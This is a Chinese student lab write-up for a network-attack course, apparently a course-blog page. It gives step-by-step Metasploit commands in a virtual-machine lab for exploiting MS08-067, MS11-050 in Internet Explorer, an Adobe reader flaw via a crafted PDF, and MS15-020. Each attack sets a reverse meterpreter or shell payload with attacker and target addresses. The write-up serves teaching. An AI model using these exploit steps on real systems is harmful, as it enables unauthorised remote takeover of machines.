20145327 《网络对抗》MSF基础应用
20145327 《网络对抗》MSF基础应用
主动攻击ms08_067
两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
kali ip地址:192.168.43.54
windows xp sp3 ip地址:192.168.43.56
ping通:

- MS08_067远程漏洞攻击实践:Shell
1.开启msfconsole.
2.输入命令search ms08_067,会显示出找到的渗透模块.

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入漏洞模块的使用.
4.输入命令show payload会显示出有效的攻击载荷.

5.set payload generic/shell_reverse_tcp设置攻击有效载荷.
6.show options显示我们需要在攻击前需要设置的数据.

7.输入命令set LHOST 192.168.43.54 ;set RHOST 192.168.43.56 show options再次查看payload状态.

8.exploit攻击

在kali上执行ipconfig/all

在win xp上执行同样的命令

- MS08_067远程漏洞攻击实践:meterpreter
1.使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。
2.设置payload:set payload windows/meterpreter/reverse_tcp
3.show options,设置的ip地址

4.exploit攻击

5.执行ifconfig,查看靶机地址:

6.ps查看进程:

7.meterpreter转shell:

针对浏览器的攻击ms11_050
kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.125

1.开启msfconsole
2.输入use windows/browser/ms11_050_mshtml_cobjectelement进入该漏洞模块
3.输入info查看信息

对应的targets:

4.设置载荷set payload windows/meterpreter/reverse_tcp

5.show options查看需要设置的相关信息:

6.设置相关信息
set LHOST 192.168.43.54 ;set LPORT 5327 ;set URIPATH cc


7.exploit,有靶机需要访问的ip地址:

8.在靶机IE上输入网址,并在靶机上查看信息

kali中显示一个session 1已经创建:

9.输入命令sessions -i 1,开始连接

10.已经攻击成功了,开始按键抓取或者获取shell


Adobe阅读器渗透攻击
kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.100

1.开启msfconsole。
2.use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用
3.set payload windows/meterpreter/reverse_tcp设置攻击有效载荷
4.show options

5.输入命令
set FILENAME gc.pdf ;set LHOST 192.168.43.54 ;set LPORT 5327
再次使用show options,看是否设置成功

6.exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里

7.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
8.使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。输入命令set LHOST 192.168.43.54 set LPORT 5327和攻击模块里的数据设置为一样的。

9.exploit开始攻击,在xp中打开pdf
很无奈 在xp中死活粘不了PDF

要是能粘上肯定是成功的,摊手与微笑.jpg
成功应用任何一个辅助模块 ms15-020
两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.125
共享主机win10:192.168.43.64
search ms15 //搜索关键字相关漏洞

启动msf msfconsole
漏洞利用模块 use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
查看漏洞相关信息 info
设置一个反弹shellset payload windows/meterpreter/reverse_tcp

show options设置参数

设置win10(开着共享)地址 set UNCHOST 192.168.43.64
设置共享文件的文件夹 这里主机192.168.43.64在C盘下的share里文件夹开启了共享 set UNCSHARE share
set LHOST 192.168.43.54

exploit

去生成的目录下把文件拷贝到共享主机的共享文件夹下
这拷贝我真是多灾多难呀

所以我尝试开三个虚拟机 希望我的电脑不会炸 微笑.jpg
很绝望 问了小组长负责人学霸都无法解决

关了不甘心又再试了一次,成功粘了俩 然而文件名过长那个该怎么办

实验后回答问题
什么是exploit,payload,encode
exploit是设置攻击参数发送到靶机
payload就是一种载荷shellcode包装成文件
encode是编码实验总结与体会
非常感谢课题负责人张亚军小精灵的虚拟机提供,提供很大帮助避免不少麻烦。这次实验的复制粘贴闹了鬼我很是绝望。
20145327 《网络对抗》MSF基础应用的更多相关文章
- 网络对抗——web基础
网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用
2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
随机推荐
- NEFU 117 - 素数个数的位数 - [简单数学题]
题目链接:http://acm.nefu.edu.cn/JudgeOnline/problemShow.php?problem_id=117 Time Limit:1000ms Memory Limi ...
- Intellij Idea常用配置设置
1.配置Intellij Idea的配置文件从默认c盘转移到其他盘符 找到Intellij idea的安装文件,在bin目录下找到idea.properties配置文件,如下把Idea的配置文件夹和I ...
- 【linux & &&命令】&后台(并行)命令 &&串行命令
& 放在一个命令末尾,可以将这个命令放到后台执行.放到后台后主进程将继续向下执行,后台命令将与主进程并行执行. && 放在一个命令末尾,与什么都没有单纯换行实际效果相同,等待 ...
- LightOJ 1038 - Race to 1 Again(期望+DP)
题目链接:http://lightoj.com/volume_showproblem.php?problem=1038 题意是:给你一个N (1 ≤ N ≤ 105) 每次N都随机选一个因子d,然后让 ...
- paas平台
paas平台 定义:PaaS是云计算中重要的一类服务,为用户提供应用的全生命周期管理和相关的资源服务.通过PaaS,用户可以完成应用的构建.部署.运维管理,而不需要自己去搭建计算环境,如安装服务器.操 ...
- DLL远程注入及卸载实现
实现win7 64位系统下dll的远程注入及卸载,尚未再其他系统测试 源码地址:https://github.com/ndhisrfzs/InjectDll
- pyqt5核心-信号与槽(第二弹)
果: from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.s ...
- 【Python接口测试】简单系统登录接口测试实例
我们可以用Jmeter做接口测试,但是呢个人觉得那个有点局限性,用python就灵活很多, 可以按自己的思路来构建比较灵活,下面给大家介绍一个简单的接口测试实例. 一.我们的思路如下: 首先我们要弄清 ...
- 【剑指offer】包含min函数的栈
一.题目: 定义栈的数据结构,请在该类型中实现一个能够得到栈中所含最小元素的min函数. 二.思路: 无,Z(zhi)Z(zhang)式操作. 三.代码:
- 【剑指offer】合并两个排序的链表
一.题目: 输入两个单调递增的链表,输出两个链表合成后的链表,当然我们需要合成后的链表满足单调不减规则. 二.思路: 递归思想,首先判断一方为空的情况,一方为空则直接返回另一方.都不为空时,首先找到表 ...